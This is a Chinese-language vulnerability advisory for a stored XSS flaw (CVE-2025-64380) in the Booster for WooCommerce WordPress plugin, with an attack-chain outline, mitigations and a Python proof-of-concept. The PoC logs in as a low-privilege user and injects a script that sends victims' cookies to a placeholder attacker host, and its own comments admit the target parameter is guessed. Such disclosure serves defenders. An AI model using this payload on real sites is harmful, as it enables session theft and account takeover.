CVE-2025-64380: Booster for WooCommerce插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64380

漏洞类型

存储型XSS

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Booster for WooCommerce (woocommerce-jetpack)

漏洞概述

CVE-2025-64380是WordPress插件Booster for WooCommerce中发现的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于woocommerce-jetpack组件中，由于对用户输入处理不当，未能正确对输入进行中立化转义，导致攻击者可以在受影响的页面中注入恶意JavaScript代码。攻击者利用该漏洞需要具有低权限用户账号（如订阅者或客户），并诱导管理员或具有更高权限的用户访问包含恶意脚本的页面。一旦恶意脚本被执行，攻击者可以窃取会话Cookie、劫持用户会话、执行未授权操作或进行进一步的攻击。该漏洞影响Booster for WooCommerce 7.3.2及以下所有版本。由于该插件在WordPress生态中广泛使用，估计有超过10万个网站可能受到影响。存储型XSS相比反射型XSS更为危险，因为恶意脚本会永久存储在服务器端，所有访问该页面的用户都会受到攻击。

技术细节

该存储型XSS漏洞存在于Booster for WooCommerce插件的woocommerce-jetpack模块中。漏洞的根本原因是应用程序在将用户提交的数据存储到数据库时，未能对特殊字符进行适当的HTML实体编码。当这些未经过滤的数据被其他用户访问时，浏览器会将其解析为可执行的HTML/JavaScript代码。攻击者可以在WordPress评论、产品描述、结账表单等用户可输入的区域插入恶意脚本。由于该插件处理WooCommerce的多种功能模块，攻击面较为广泛。漏洞利用时，攻击者构造包含<script>标签或事件处理器(如onerror、onload)的payload，当管理员访问相关管理页面或前端页面时，恶意代码即被执行。CVSS 3.1评分6.5表明该漏洞需要特定条件配合才能利用，但仍具有实际威胁价值。

攻击链分析

STEP 1

步骤1

攻击者注册低权限账号（如订阅者或客户）到目标WordPress网站

STEP 2

步骤2

攻击者识别Booster for WooCommerce插件的漏洞输入点

STEP 3

步骤3

攻击者构造包含恶意JavaScript代码的XSS payload并提交到漏洞字段

STEP 4

步骤4

恶意脚本被存储到数据库中，未经过滤的HTML实体编码

STEP 5

步骤5

当管理员或高权限用户访问包含恶意内容的页面时，浏览器执行恶意脚本

STEP 6

步骤6

恶意脚本窃取用户会话Cookie、劫持账户或执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-64380 PoC - Stored XSS in Booster for WooCommerce
# Target: WordPress site with Booster for WooCommerce <= 7.3.2

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# XSS payload - steals cookies
XSS_PAYLOAD = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'

def login_wp():
    """Login to WordPress and get session cookie"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/wp-login.php"
    data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/"
    }
    response = session.post(login_url, data=data)
    return session if 'wordpress_logged_in' in session.cookies else None

def exploit_stored_xss(session):
    """Inject XSS payload into vulnerable field"""
    # Target the vulnerable woocommerce-jetpack module
    # Adjust the endpoint based on the actual vulnerable parameter
    post_url = f"{TARGET_URL}/wp-admin/admin.php?page=wc-settings&tab=jetpack"
    
    # This payload targets the vulnerable input field
    # The actual vulnerable parameter needs to be identified through testing
    exploit_data = {
        'jetpack_option_name': XSS_PAYLOAD,  # Example parameter
        'wc-jetpack-submit': 'Save'
    }
    
    response = session.post(post_url, data=exploit_data)
    return response.status_code == 200

def main():
    print(f"[*] CVE-2025-64380 PoC - Booster for WooCommerce Stored XSS")
    print(f"[*] Target: {TARGET_URL}")
    
    session = login_wp()
    if not session:
        print("[-] Authentication failed")
        sys.exit(1)
    
    print("[+] Successfully authenticated")
    
    if exploit_stored_xss(session):
        print("[+] XSS payload injected successfully")
        print(f"[*] Payload: {XSS_PAYLOAD}")
        print("[*] Wait for admin to visit affected page to trigger XSS")
    else:
        print("[-] Failed to inject payload")

if __name__ == "__main__":
    main()

影响范围

Booster for WooCommerce <= 7.3.2

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制低权限用户创建内容的功能；2) 在Web服务器层面配置XSS防护头部；3) 使用WordPress安全插件提供额外的输入过滤；4) 监控网站日志以检测可疑活动；5) 考虑暂时禁用Booster for WooCommerce插件的相关功能模块，直到完成安全更新。